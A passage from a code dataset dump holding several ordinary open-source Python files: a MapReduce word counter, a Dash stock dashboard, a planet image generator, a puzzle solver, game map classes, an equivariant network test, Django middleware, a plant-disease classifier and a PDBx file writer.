[s.lower() for s in text]\n # remove punctuation\n punct = set(['.'])\n # text = ''.join([s for s in text if s not in punct])\n text = [s.replace('.','').replace(',','') for s in text]\n\n # now tokenizing. 
turn a sentence into list of words\n text = [t.split(' ') for t in text]\n\n # flatten it\n text = [item for sublist in text for item in sublist]\n return text\n\n# Reduce\n# Reduce is a processing task that takes in key-value pair input and\n# reduces the number of pairs by aggregating them. The output is the\n# list of summed values.\n\ndef reducing(wordlist):\n # now that we have the list of words, we count the overall occurrences\n wordlist = [[word, wordlist.count(word)] for word in set(wordlist)]\n return wordlist\n\n\n# words = mapping(text2)\n# print(words)\n# wordcount = reducing(words)\n# print(wordcount)\n\n\nprint(\" ** Method 2: Using a dict to implement MapReduce.\")\n\ndef mapping2(text):\n # In context of text analysis, mapping is done by first tokenizing\n # words in a sentence.\n\n # Before everything else, cleaning has to be done\n # lowercasing\n text = [s.lower() for s in text]\n # remove punctuation\n punct = set(['.'])\n # text = ''.join([s for s in text if s not in punct])\n text = [s.replace('.','').replace(',','') for s in text]\n\n # now tokenizing. turn a sentence into list of words\n text = [t.split(' ') for t in text]\n\n # flatten it\n text = [[item,1] for sublist in text for item in sublist]\n\n # add count:\n return text\n\n\ndef reducing2(keyvalue):\n # now that we have the list of words, we count the overall occurrences\n wordcount = {}\n for item in keyvalue:\n # add key to dict if it's not already there\n # if it's there, add 1\n wordcount[item[0]] = wordcount.get(item[0], 0) + 1\n \n return wordcount\n\nwords = mapping2(text1)\nprint(words)\nwordcount = reducing2(words)\nprint(wordcount)\n","repo_name":"maximillianus/python-scripts","sub_path":"mapreduce/mapreduce2.py","file_name":"mapreduce2.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71046074028","text":"# Perform imports here:\nimport plotly.graph_objs as go\nimport numpy as np\nimport pandas as pd\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nfrom datetime import datetime as dt\nfrom datetime import datetime\nimport pandas_datareader.data as web\nimport os\nimport json\n\n########################################################################################################\n# Specify Your IEX API Token here\nos.environ[\"IEX_API_KEY\"] = \"\"\n########################################################################################################\n\ndf = pd.read_csv(\"./data/NASDAQcompanylist.csv\")\noption_dict = [{'label': i, 'value': i} for i in df['Name'].unique()]\n\n# Launch the application:\napp = dash.Dash()\n\n# Create a Dash layout that contains input components\n# and at least one output. Assign IDs to each component:\napp.layout = html.Div([\n html.Div(\"Stock Ticker Dashboard\",\n style={\"fontSize\":\"30\", \"marginLeft\":\"10px\"}),\n html.Label(\"Select Stock symbols\", style={'width': '30%', 'display': 'inline-block'}),\n html.Label(\"Select Start and End date\", style={'width':' 40%', 'display': 'inline-block'}),\n html.Div(),\n html.Div(\n dcc.Dropdown(id='my_company',\n options=option_dict,\n multi=True,\n value=[]),\n style={'width': '30%', 'display': 'inline-block'}),\n html.Div(dcc.DatePickerRange(id='my_date_picker',\n min_date_allowed=datetime(2015, 1, 1),\n max_date_allowed=datetime.today(),\n start_date=datetime(2018, 1, 1),\n end_date=datetime.today()),\n style={'width': '40%', 'display': 'inline-block'}),\n html.Div(html.Button(id='submit_button', n_clicks=0, children='Submit'),\n style={'width': '30%', 'display': 'inline-block'}),\n html.Div(),\n dcc.Graph(id='result_plot',\n figure={'data': go.Scatter(),\n 'layout': go.Layout(hovermode=\"closest\", title=\"my_plot\")}),\n dcc.Markdown(id=\"my_explanation\", children=\"\"),\n])\n\n\n# Create a Dash callback:\n@app.callback(Output('result_plot', 'figure'),\n [Input('submit_button', 'n_clicks')],\n [State('my_company', 'value'),\n State('my_date_picker', 'start_date'),\n State('my_date_picker', 'end_date')])\ndef update_figure(n_clicks, companies, start_date, end_date):\n\n traces =[]\n for i in companies:\n df = web.DataReader(i, 'iex', start_date, end_date, access_key=os.environ[\"IEX_API_KEY\"])\n traces.append({'x':df.index, 'y': df.close, 'name':i})\n\n fig = {\n 'data': traces,\n 'layout': {'title': ', '.join(companies) + ' Closing Prices'}\n }\n return fig\n\n@app.callback(Output('my_explanation', 'children'),\n [Input('result_plot', 'clickData')])\ndef update_figure2(selected_data):\n 
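# Dash delivers clickData as a plain dict (or None before any click); each point in\n # its 'points' list carries the trace index as 'curveNumber' and the clicked value as 'y'.\n 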
my_json_comment = selected_data\n\n comment = \"\"\n if my_json_comment:\n for point in my_json_comment[\"points\"]:\n comment += \"the index for {} is in {} \\n\".format(point['curveNumber'], point['y'])\n\n return comment\n\n# Add the server clause:\napp.run_server()\n","repo_name":"chenpoi/CodeExample","sub_path":"PythonExample/Stock_price_visualization_task.py","file_name":"Stock_price_visualization_task.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36631280327","text":"#!/usr/bin/python\n\nfrom PIL import Image\nfrom layers.Space import Space\nimport layers\n\nWIDTH = 1920\nHEIGHT = 1080\nZOOM = 100\nSEED = 96\nRENDER_PER_STEP = False\nRENDER_PER_LAYER = False\nBACKGROUND = 'black'\nMAX_LAYERS = None\nSHOW = False\n\nfrom optparse import OptionParser\nparser = OptionParser()\nparser.add_option(\"-W\", \"--width\",\n metavar=\"NUMBER\", type=\"int\",\n dest=\"width\", default=WIDTH,\n help=\"Width of image\")\nparser.add_option(\"-H\", \"--height\",\n metavar=\"NUMBER\", type=\"int\",\n dest=\"height\", default=HEIGHT,\n help=\"Height of image\")\nparser.add_option(\"-z\", \"--zoom\",\n metavar=\"NUMBER\", type=\"int\",\n dest=\"zoom\", default=ZOOM,\n help=\"Zoom represents diameter of largest planet in pixels\")\nparser.add_option(\"-s\", \"--seed\",\n metavar=\"NUMBER\", type=\"int\",\n dest=\"seed\", default=SEED,\n help=\"Seed used to generate image\")\nparser.add_option('-S', \"--steps\",\n action=\"store_true\", dest=\"steps\", default=False,\n help=\"Render each step separately\")\nparser.add_option('-L', \"--layers\",\n action=\"store_true\", dest=\"layers\", default=False,\n help=\"Render each layer separately\")\nparser.add_option(\"-t\", \"--temporary\",\n action=\"store_true\", dest=\"temporary\", default=False,\n help=\"Store image result in temporary file and display result.\")\noptions, optionsValues = parser.parse_args()\n\nWIDTH = options.width\nHEIGHT = options.height\nZOOM = options.zoom\nSEED = options.seed\nRENDER_PER_STEP = options.steps\nRENDER_PER_LAYER = options.layers\nSHOW = options.temporary\n\nimport random\nrandom.seed(SEED)\n\nusedLayers = [layers.LayerPlanets(), layers.LayerPlanetsSelection(), layers.LayerPlanetsTerrain(), layers.LayerPlanetsTrees(), layers.LayerPlanetsLife()]\n\nim = Image.new(\"RGB\", (WIDTH, HEIGHT), BACKGROUND)\nspace = Space(SEED)\n\ndef saveImage(image, steps, layers):\n if SHOW:\n image.show()\n else:\n name = \"out\"\n if steps != None:\n name += \"-s\" + str(steps)\n if layers != None:\n name += \"-l\" + str(layers)\n name += \".png\"\n image.save(name, 'PNG')\n print(\"Image saved as \" + name)\n\nfor layer in usedLayers:\n layer.init(space)\n\n#\n# GENERATE LAYERS\n#\nrequiredLayersCount = 0\nfor layer in usedLayers:\n if layer.get_min_zoom() <= ZOOM:\n requiredLayersCount += 1\n\nif MAX_LAYERS and requiredLayersCount > MAX_LAYERS:\n requiredLayersCount = MAX_LAYERS\n\nallSuccess = False\nsize = 0\nwhile not allSuccess:\n allSuccess = True\n size += 1\n for layerIndex in range(0, requiredLayersCount):\n layer = usedLayers[layerIndex]\n for x in range(-1 * size, size):\n for y in range(-1 * size, size):\n layer.generate(space, x, y, random.random)\n\n w = int(WIDTH / 2 / ZOOM) + 1\n h = int(HEIGHT / 2 / ZOOM) + 1\n for x in range(-1 * w, w):\n for y in range(-1 * h, h):\n if space.getBlockLayer(x, y) < requiredLayersCount:\n allSuccess = False\n\n #\n # RENDER LAYERS\n #\n def 
transition(coords):\n scalar = type(coords) not in (tuple, list)\n if scalar:\n coords = (coords,)\n scalar = True\n #zoom\n coords = [x * ZOOM for x in coords]\n\n #offset\n if len(coords) == 2:\n coords[0] += WIDTH / 2\n coords[1] += HEIGHT / 2\n\n #round\n coords = [int(x) for x in coords]\n\n if scalar:\n return coords[0]\n else:\n return coords\n\n if RENDER_PER_STEP:\n im.paste(BACKGROUND, (0, 0, WIDTH, HEIGHT))\n li = 0\n for layer in usedLayers:\n layer.render(space, im, transition)\n if RENDER_PER_LAYER:\n saveImage(im, size, li)\n li += 1\n if not RENDER_PER_LAYER:\n saveImage(im, size, None)\n\nif not RENDER_PER_STEP:\n li = 0\n for layer in usedLayers:\n layer.render(space, im, transition)\n if RENDER_PER_LAYER:\n saveImage(im, None, li)\n li += 1\n if not RENDER_PER_LAYER:\n saveImage(im, None, None)\n","repo_name":"dee-gmiterko/py-2050","sub_path":"2050.py","file_name":"2050.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23613767695","text":"import random\n\nMAP_WIDTH = 20\n\ndef make_map(level):\n height = len(level)\n width = len(level[0])\n\n m = {}\n m['devices_remaining'] = 0\n m['path'] = []\n m['device_path'] = []\n m['teleporters'] = []\n data = m['data'] = {}\n\n for yIndex, yLevel in enumerate(level):\n y = height - yIndex - 1\n for x, xLevel in enumerate(yLevel):\n coord = (x, y)\n if xLevel == '*':\n m['player'] = coord\n data[coord] = '_'\n elif xLevel == '_' or xLevel == ' ':\n data[coord] = xLevel\n elif xLevel == 'E':\n data[coord] = xLevel\n m['teleporters'].append(coord)\n m['devices_remaining'] += 1\n else:\n data[coord] = xLevel\n m['devices_remaining'] += 1\n \n\n return m\n \ndef _copy(g):\n return {\n 'player' : g['player'],\n 'data' : g['data'].copy(),\n 'devices_remaining' : g['devices_remaining'],\n 'path' : g['path'][:],\n 'device_path' : g['device_path'][:],\n 'teleporters' : g['teleporters'][:],\n }\n\ndef _handle_effect(g, dest):\n data = g['data']\n\n while True:\n tile = data[dest]\n \n if tile == '_':\n break\n elif tile == ' ':\n dest = dest[0], dest[1] - 1\n else:\n g['device_path'].append(dest)\n if tile == 'S':\n g['devices_remaining'] -= 1\n data[dest] = '_'\n if g['facing'] == 'left':\n dest = dest[0] - 1, dest[1] + 2\n else:\n dest = dest[0] + 1, dest[1] + 2\n elif tile == 'R':\n g['devices_remaining'] -= 1\n data[dest] = ' '\n if g['facing'] == 'left':\n dest = dest[0] - 1, dest[1]\n else:\n dest = dest[0] + 1, dest[1]\n elif tile == 'T':\n g['devices_remaining'] -= 1\n data[dest] = '_'\n dest = dest[0], dest[1] - 1\n elif tile == 'E':\n g['devices_remaining'] -= 2\n newDest = [x for x in g['teleporters'] if x != dest][0]\n data[dest] = '_'\n data[newDest] = '_'\n dest = newDest\n\n g['player'] = dest\n g['path'].append('Effect to {0}'.format(dest))\n return g\n\ndef _move_left(g):\n data = g['data']\n playerX = g['player'][0]\n playerY = g['player'][1]\n g['facing'] = 'left'\n\n newX = playerX\n while newX > 1:\n newX -= 1\n dest = (newX, playerY)\n if data[dest] != '_':\n g['path'].append('left to {0}'.format(dest))\n return _handle_effect(g, dest)\n\n return None\n\ndef _move_right(g):\n data = g['data']\n playerX = g['player'][0]\n playerY = g['player'][1]\n g['facing'] = 'right'\n\n newX = playerX\n while newX < MAP_WIDTH - 1:\n newX += 1\n dest = (newX, playerY)\n if data[dest] != '_':\n g['path'].append('right to {0}'.format(dest))\n return _handle_effect(g, dest)\n\n return None\n\ndef solve(g):\n if 
g['devices_remaining'] == 0:\n return [g['device_path']], []\n\n winning_solutions = []\n losing_solutions = []\n\n leftG = _move_left(_copy(g))\n rightG = _move_right(_copy(g))\n\n if leftG:\n w, l = solve(leftG)\n winning_solutions += w\n losing_solutions += l\n\n if rightG:\n w, l = solve(rightG)\n winning_solutions += w\n losing_solutions += l\n\n if len(winning_solutions) == 0:\n losing_solutions += [g['device_path']]\n return winning_solutions, losing_solutions\n\n \ndef prune_paths(win_paths, loss_paths):\n real_losses = []\n\n for loss_path in loss_paths:\n found_match = False\n for win_path in win_paths:\n if win_path[:len(loss_path)] == loss_path:\n found_match = True\n break\n\n if not found_match:\n real_losses.append(loss_path)\n\n # Remove duplicate win scenarios\n real_wins = list(set([tuple(x) for x in win_paths]))\n # Remove duplicate loss scenarios\n real_losses = list(set([tuple(x) for x in real_losses]))\n\n # Now go through losses that are really just the start\n # to other losses and remove those\n real_losses_2 = []\n\n for loss_path1 in real_losses:\n found_parent = False\n for loss_path2 in real_losses:\n if loss_path1 == loss_path2:\n continue\n\n if loss_path1[:len(loss_path2)] == loss_path2:\n found_parent = True\n break\n\n if not found_parent:\n real_losses_2.append(loss_path1)\n\n return real_wins, real_losses_2\n \n\ndef create_random(m):\n results = []\n for yIndex, y in enumerate(m):\n result = ''\n for xIndex, x in enumerate(y):\n if x == '?':\n result = result + random.choice(['R', 'T', 'S'])\n else:\n result = result + x\n results.append(result)\n\n \n return results\n","repo_name":"markhildreth/ld26-solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120768620","text":"from __future__ import annotations\n\n__all__ = [\n \"Map\",\n \"MapEntry\",\n \"MapEntity\",\n \"MapTyping\",\n]\n\nimport typing as tp\nfrom enum import IntEnum, unique\n\nfrom .basic_types import BaseGameObject\n\n\nclass Map(BaseGameObject):\n def __init__(\n self,\n area_id: tp.Optional[int],\n block_id: tp.Optional[int],\n cc_id: tp.Optional[int] = 0,\n dd_id: tp.Optional[int] = 0,\n name=None,\n emevd_file_stem=None,\n msb_file_stem=None,\n ai_file_stem=None,\n esd_file_stem=None,\n ffxbnd_file_name=None,\n variable_name=None,\n verbose_name=None,\n ):\n \"\"\"\n Create a game map instance with associated naming information. These instances can be used as arguments in EVS\n instructions.\n\n Soulstruct defines constants for existing game maps already, so you shouldn't need to use this class yourself.\n (You can theoretically use transient `Map(a, b)` calls as arguments in EVS instructions, but you may as well\n just use a tuple `(a, b)` in that case, which is also accepted.)\n\n Args:\n area_id: Area ID of map, which is the first number (of four) in the full map ID. Multiple maps can appear in\n the same area. Some game files (such as lighting parameters) are area-specific rather than map-specific.\n block_id: Block ID of map, which is the second number (of four) in the full map ID. Generally, the area ID\n and block ID fully specify the map. The third number in the map ID is essentially never used and the\n fourth number is only used for file revision purposes (e.g. 
the Dark Souls DLC version of Darkroot).\n cc_id: Third part of map ID, used only in later games with lots of maps.\n dd_id: Fourth and final part of map ID, used only in later games with lots of maps.\n\n name: Canonical name of map (e.g. \"undeadburg\"). Note that the map-finding utility `get_map` ignores case\n and underscores when looking for a specific name.\n\n emevd_file_stem: Name of `emevd` file for this map, without extension.\n msb_file_stem: Name of `msb` file for this map, without extension.\n ai_file_stem: Name of 'luabnd[.dcx]' for this map, without extension(s).\n esd_file_stem: Name of 'talkesdbnd[.dcx]' for this map, without extension(s).\n\n ffxbnd_file_name: Name of 'ffxbnd[.dcx]' file that Soulstruct should modify for this map. Map areas with\n multiple blocks may have an area-wide file and block-specific files that are both loaded. The block-\n specific files are preferred for ease/efficiency.\n\n variable_name: Name to use in EVS output (typically upper case with underscores).\n verbose_name: Full descriptive name of map for display in certain output-only fields.\n\n `name`, `emevd_file_stem`, `msb_file_stem`, `ai_file_stem`, and `esd_file_stem` all default to\n `m{area_id:02d}_{block_id:02d}_00_00` if not specified. `verbose_name` defaults to `name`. `variable_name`\n defaults to None (not a valid EVS instruction argument).\n \"\"\"\n self.area_id = area_id\n self.block_id = block_id\n self.cc_id = cc_id\n self.dd_id = dd_id\n\n if area_id is not None and block_id is not None:\n base_id = f\"m{area_id:02d}_{block_id:02d}_{cc_id:02d}_{dd_id:02d}\"\n else:\n base_id = None\n self.name = base_id if name is None else name\n\n self.emevd_file_stem = base_id if emevd_file_stem is None else emevd_file_stem\n self.msb_file_stem = base_id if msb_file_stem is None else msb_file_stem\n self.ai_file_stem = base_id if ai_file_stem is None else ai_file_stem\n self.esd_file_stem = base_id if esd_file_stem is None else esd_file_stem\n self.map_load_tuple = (area_id, block_id, -1, -1) # for `MSBMapConnection`\n self.ffxbnd_file_name = ffxbnd_file_name\n\n self.variable_name = variable_name\n self.verbose_name = self.name if verbose_name is None else verbose_name\n\n if self.area_id is not None:\n self.base_entity_id = 100000 * self.area_id + 10000 * self.block_id\n self.flag_prefix = 1000 + 10 * self.area_id + self.block_id\n\n def stem_set(self):\n return {\n stem\n for stem in (self.emevd_file_stem, self.msb_file_stem, self.ai_file_stem, self.esd_file_stem)\n if stem\n }\n\n def __eq__(self, other_map: Map):\n return self.area_id == other_map.area_id and self.block_id == other_map.block_id\n\n def __iter__(self):\n return iter((self.area_id, self.block_id, self.cc_id, self.dd_id))\n\n def __repr__(self):\n return self.emevd_file_stem\n\n def __getitem__(self, index: int):\n if index == 0:\n return self.area_id\n elif index == 1:\n return self.block_id\n elif index == 2:\n return self.cc_id\n elif index == 3:\n return self.dd_id\n else:\n raise ValueError(f\"Index for `Map` must be 0, 1, 2, or 3, not {index}.\")\n\n @classmethod\n def NO_MAP(cls):\n \"\"\"Used as a default null map in MSB.\"\"\"\n return cls(0, 0, 0, 0, name=\"NONE\")\n\n\nclass MapEntry(BaseGameObject):\n \"\"\"Anything that appears in an MSB.\"\"\"\n @classmethod\n def get_msb_entry_type_subtype(cls, pluralized_subtype=False) -> [str, str]:\n \"\"\"Returns the pluralized name of the MSB type (e.g. \"Parts\") and the non-pluralized name of the subtype\n (e.g. 
\"Character\").\"\"\"\n raise NotImplementedError\n\n @classmethod\n def get_msb_class_name(cls) -> str:\n \"\"\"Returns the name of the Soulstruct MSB class (e.g. \"MSBRegionBox\").\n\n By default, this is done by simply prefixing \"MSB\" to the class name.\"\"\"\n if cls.__name__ == \"MapEntry\":\n raise NotImplementedError(\"MapEntry base class has no corresponding non-abstract MSB class.\")\n return f\"MSB{cls.__name__}\"\n\n\n@unique\nclass MapEntity(MapEntry, IntEnum):\n \"\"\"Any MSB entry with an entity ID (enum values).\"\"\"\n\n @classmethod\n def get_msb_entry_type_subtype(cls, pluralized_subtype=False) -> [str, str]:\n raise NotImplementedError\n\n @classmethod\n def get_id_start_and_max(cls) -> tuple[int, int]:\n \"\"\"Return first and last entity ID value for automatic generation of entity IDs for specific `game`.\n\n Not supported by default; supported subclasses will override this method.\n \"\"\"\n raise TypeError(f\"`{cls.__name__}` does not use entity IDs.\")\n\n @classmethod\n def auto_generate(cls, count, map_range_start: int):\n \"\"\"Get value for `auto()`.\n\n Raises `TypeError` if not valid for this class, and `NotImplementedError` if not implemented for given `game`.\n \"\"\"\n start_value, max_value = cls.get_id_start_and_max()\n value = map_range_start + start_value + count\n if value > map_range_start + max_value:\n raise ValueError(f\"Too many members in `{cls.__name__}` for `auto()` range `({start_value}, {max_value})`.\")\n return value\n\n # noinspection PyMethodOverriding\n @staticmethod\n def _generate_next_value_(name, start, count, last_values):\n raise ValueError(\"Cannot use `auto()` for this `MapEntity` subclass.\")\n\n\nMapTyping = tp.Union[Map, tuple, list]\n","repo_name":"Grimrukh/soulstruct","sub_path":"soulstruct/base/game_types/map_types.py","file_name":"map_types.py","file_ext":"py","file_size_in_byte":7429,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"37"} +{"seq_id":"9728469368","text":"from __future__ import print_function\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torchvision\nimport numpy as np\nimport os\nimport shutil\nfrom collections import OrderedDict\nfrom tqdm import tqdm\n\n# model\nclass MyModel(nn.Module):\n def __init__(self, num_classes, model_name=\"resnet101\", backbone_size=2048, pretrained=False, droprate=0.0,\n device=\"cpu\"):\n super(MyModel, self).__init__()\n self.pretrained = pretrained\n\n _model = torchvision.models.resnet.__dict__[model_name](pretrained=pretrained)\n self.backbone = nn.Sequential(OrderedDict([\n ('conv1', _model.conv1),\n ('bn1', _model.bn1),\n ('relu1', _model.relu),\n ('maxpool1', _model.maxpool),\n\n (\"layer1\", _model.layer1),\n (\"layer2\", _model.layer2),\n (\"layer3\", _model.layer3),\n (\"layer4\", _model.layer4),\n ]))\n self._conv1 = nn.Sequential(\n nn.Dropout(droprate),\n nn.Conv2d(backbone_size, num_classes, 1, 1),\n nn.BatchNorm2d(num_classes),\n nn.ReLU()\n )\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n # self.avgpool = nn.AvgPool2d(1,stride=7,padding=0))\n # self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n def forward(self, x):\n x = self.backbone(x)\n x = self._conv1(x)\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n # x = self.fc(x)\n return x\n\n\ndef predict(model, device, test_loader,category=[]):\n model.eval()\n with torch.no_grad():\n for data, path in tqdm(test_loader):\n data = data.to(device)\n output = F.softmax(model(data),-1)\n score,pred = output.max(1, 
keepdim=False)\n for _score,_pred,_path in zip(score,pred,path):\n label=category[int(_pred)]\n if _score<0.8:label=\"unknow\"\n save_path=os.path.join(os.path.dirname(_path),label)\n if not os.path.exists(save_path):os.makedirs(save_path)\n # save_path=os.path.join(save_path,os.path.basename(_path).replace(\".jpg\",\"_%0.3f.jpg\"%(_score)))\n save_path=os.path.join(save_path,os.path.basename(_path))\n shutil.move(_path,save_path)\n\n# base_dir = \"/media/wucong/work/practice/data/tomato\"\n# category=sorted(os.listdir(os.path.join(base_dir, \"train\")))\n# print(category)\ncategory=['Tomato___Bacterial_spot', 'Tomato___Early_blight', 'Tomato___Late_blight', 'Tomato___Leaf_Mold',\n 'Tomato___Septoria_leaf_spot', 'Tomato___Spider_mites_Two_spotted_spider_mite', 'Tomato___Target_Spot',\n 'Tomato___Tomato_Yellow_Leaf_Curl_Virus', 'Tomato___Tomato_mosaic_virus', 'Tomato___healthy']\n","repo_name":"wucng/Study","sub_path":"cuda/tensorrt/python/example/service/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38169745221","text":"from typing import Callable\n\nimport jax\nimport jax.numpy as jnp\nimport haiku as hk\nimport chex\n\nfrom eacf.utils.test import assert_is_invariant, assert_is_equivariant\nfrom eacf.nets.make_egnn import EquivariantForwardFunction\nfrom eacf.nets.en_gnn import make_egnn_torso_forward_fn, EGNNTorsoConfig\nfrom eacf.utils.graph import get_senders_and_receivers_fully_connected\n\n\ndef make_egnn_torso(\n n_invariant_feat_hidden: int = 5,\n n_vectors_hidden_per_vec_in: int = 2) -> EquivariantForwardFunction:\n config = EGNNTorsoConfig(\n n_blocks=2,\n mlp_units=(2,2),\n n_vectors_hidden_per_vec_in=n_vectors_hidden_per_vec_in,\n n_invariant_feat_hidden=n_invariant_feat_hidden,\n name='e3gnn_torso')\n egnn_torso = make_egnn_torso_forward_fn(config)\n return egnn_torso\n\n\ndef tesst_net_does_not_smoke(\n make_torso: Callable[[int, int], EquivariantForwardFunction],\n n_invariant_feat_hidden: int = 5,\n n_vectors_hidden_per_vec_in: int = 2,\n dim: int = 2,\n n_nodes: int = 5,\n vec_multiplicity_in: int = 2) -> None:\n \"\"\"Basis test that the egnn doesn't throw an error, and of invariance and equivariances.\"\"\"\n\n @hk.without_apply_rng\n @hk.transform\n def forward(positions, features):\n egnn_torso = make_torso(n_invariant_feat_hidden, n_vectors_hidden_per_vec_in)\n senders, receivers = get_senders_and_receivers_fully_connected(n_nodes)\n vectors, scalars = egnn_torso(positions, features, senders, receivers)\n return vectors, scalars\n\n\n key = jax.random.PRNGKey(0)\n positions = jax.random.normal(key, (n_nodes, vec_multiplicity_in, dim))\n features = jnp.ones((n_nodes, 2))\n\n params = forward.init(key, positions, features)\n\n vectors, scalars = forward.apply(params, positions, features)\n chex.assert_shape(vectors, (n_nodes, vec_multiplicity_in*n_vectors_hidden_per_vec_in, dim))\n chex.assert_shape(scalars, (n_nodes, n_invariant_feat_hidden))\n\n def invariant_fn(positions: chex.Array) -> chex.Array:\n vectors, scalars = forward.apply(params, positions, features)\n chex.assert_shape(scalars, (n_nodes, n_invariant_feat_hidden))\n return scalars\n\n def equivariant_fn(positions: chex.Array) -> chex.Array:\n vectors, scalars = forward.apply(params, positions, features)\n chex.assert_shape(vectors, (n_nodes, vec_multiplicity_in * n_vectors_hidden_per_vec_in, dim))\n return vectors\n\n # Note: features are permutation invariant, so we 
let the test's group action include permutation.\n assert_is_invariant(invariant_fn=invariant_fn, key=key, event_shape=positions.shape,\n translate=False)\n assert_is_equivariant(equivariant_fn=equivariant_fn, key=key, event_shape=positions.shape,\n translate=False, permute=True)\n print('Test passed!')\n\n\n\n\nif __name__ == '__main__':\n USE_64_BIT = True\n if USE_64_BIT:\n from jax.config import config\n config.update(\"jax_enable_x64\", True)\n\n tesst_net_does_not_smoke(make_egnn_torso)\n","repo_name":"lollcat/se3-augmented-coupling-flows","sub_path":"eacf/nets/torso_tests.py","file_name":"torso_tests.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"32053895716","text":"import traceback\n\nfrom django.core.exceptions import PermissionDenied, ObjectDoesNotExist, ValidationError\nfrom django.http import JsonResponse\nfrom django.utils.deprecation import MiddlewareMixin\nfrom general.core.logging import get_logger\nfrom general.views import JSONResponseMixin\n\nlogger = get_logger('middleware')\n\n\nclass ExceptionProcessingMiddleware(MiddlewareMixin):\n\n # def __init__(self, get_response):\n # # self.get_response = get_response\n # self.mongo_log_db = MongoDB().col_opt_log()\n # super().__init__(get_response)\n # # One-time configuration and initialization.\n # # Initialize first starting of the system\n\n # def __call__(self, request):\n # # Code to be executed for each request before\n # # the view (and later middleware) are called.\n # super().__call__(request)\n # response = self.get_response(request)\n #\n # # Code to be executed for each request/response after\n # # the view is called.\n #\n # return response\n\n def process_view(self, request, view_func, *view_args, **view_kwargs):\n \"\"\"\n Called before the view executes.\n \"\"\"\n if hasattr(view_func.__class__, 'json') and view_func.__class__.json:\n request.response_type = 'json'\n else:\n request.response_type = 'html'\n\n def process_exception(self, request, exception):\n \"\"\"\n Called when an exception is raised.\n \"\"\"\n if request.response_type == 'json':\n code = 500\n level = 'error'\n data = None\n if isinstance(exception, PermissionDenied):\n messages = 'Permission denied'\n level = 'warning'\n code = 403\n elif isinstance(exception, ObjectDoesNotExist):\n messages = list()\n for item in exception.args:\n messages.append('Object does not exist %s' % item)\n level = 'error'\n code = 404\n elif isinstance(exception, ValidationError):\n code = 402\n messages = exception.message\n else:\n messages = str(exception)\n logger.error(messages)\n logger.error(traceback.format_exc())\n return JSONResponseMixin.json_response(\n result=False, messages=messages, code=code, level=level, data=data\n )\n else:\n logger.error(str(exception))\n logger.error(traceback.format_exc())\n","repo_name":"maoxiaowang/novel","sub_path":"sandbook/base/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21754006673","text":"from collections import defaultdict\nfrom pathlib import Path\n\nimport pandas as pd # type: ignore\n\n\ndef write_pdbx(pdbx: dict[str, pd.DataFrame], file_name: str) -> None:\n \"\"\"\n Write a dict of Pandas DataFrames into a PDBx file.\n\n Args:\n pdbx (dict[str, pd.DataFrame]): a dict of Pandas DataFrames to write.\n file_name (str): file name to write the PDBx file.\n\n Returns:\n None\n \"\"\"\n # 
Validate\n if not (type(pdbx) is dict):\n raise TypeError(f\"pdbx has to be a dict but {type(pdbx)} is providied.\")\n multi_record: dict[str, int] = defaultdict(bool)\n max_tag_length: dict[str, int] = defaultdict(int)\n for category_name, records in pdbx.items():\n if not (type(records) is pd.DataFrame):\n raise TypeError(\n f\"pdbx values have to be Pandas Dataframes but {category_name} is a {type(records)}.\"\n )\n if len(records) > 1:\n multi_record[category_name] = True\n for col in records.columns:\n tag_length = len(category_name) + 1 + len(col)\n max_tag_length[category_name] = max(\n max_tag_length[category_name], tag_length\n )\n with open(file_name, \"w\") as f:\n # write header\n target_name = Path(file_name).name\n if \".cif\" == target_name[-4:]:\n f.write(f\"data_{target_name[:-4]}\\n\")\n else:\n f.write(f\"data_{target_name}\\n\")\n # write each category\n for category_name, records in pdbx.items():\n # categories that only have a record\n f.write(\"#\\n\")\n if not multi_record[category_name]:\n for col in records.columns:\n tag = f\"{category_name}.{col}\"\n f.write(f\"{tag:{max_tag_length[category_name]+3}}\")\n content = records[col].iloc[0]\n if '\"' in content and \"'\" in content:\n raise ValueError(\n f\"'{content}' cannot be written into a PDBx file.\"\n )\n elif \"'\" in content:\n content = f'\"{content}\"'\n elif '\"' in content:\n content = f\"'{content}'\"\n elif \" \" in content:\n content = f\"'{content}'\"\n\n content_length = len(content)\n if tag_length + content_length > 130:\n content = content.strip('\"').strip(\"'\")\n f.write(\"\\n;\")\n if category_name == \"_struct_ref\":\n for i in range(0, content_length // 80):\n f.write(f\"{content[80*i:80*(i+1)]}\\n\")\n else:\n f.write(f\"{content}\\n\")\n f.write(\";\\n\")\n else:\n f.write(f\"{content}\\n\")\n\n # categories that have multiple records\n else:\n max_col_length = defaultdict(int)\n for col in records.columns:\n max_col_length[col] = max(records[col].str.len())\n if records[col].str.contains(\" \").any():\n max_col_length[col] = max_col_length[col] + 2\n f.write(f\"{category_name}.{col}\\n\")\n for _, record in records.iterrows():\n for col in records.columns:\n content = record[col]\n pad_length = max_col_length[col]\n if '\"' in content and \"'\" in content:\n raise ValueError(\n f\"'{content}' cannot be written into a PDBx file.\"\n )\n elif \"'\" in content:\n content = f'\"{content}\"'\n elif '\"' in content:\n content = f\"'{content}'\"\n elif \" \" in content:\n content = f\"'{content}'\"\n\n 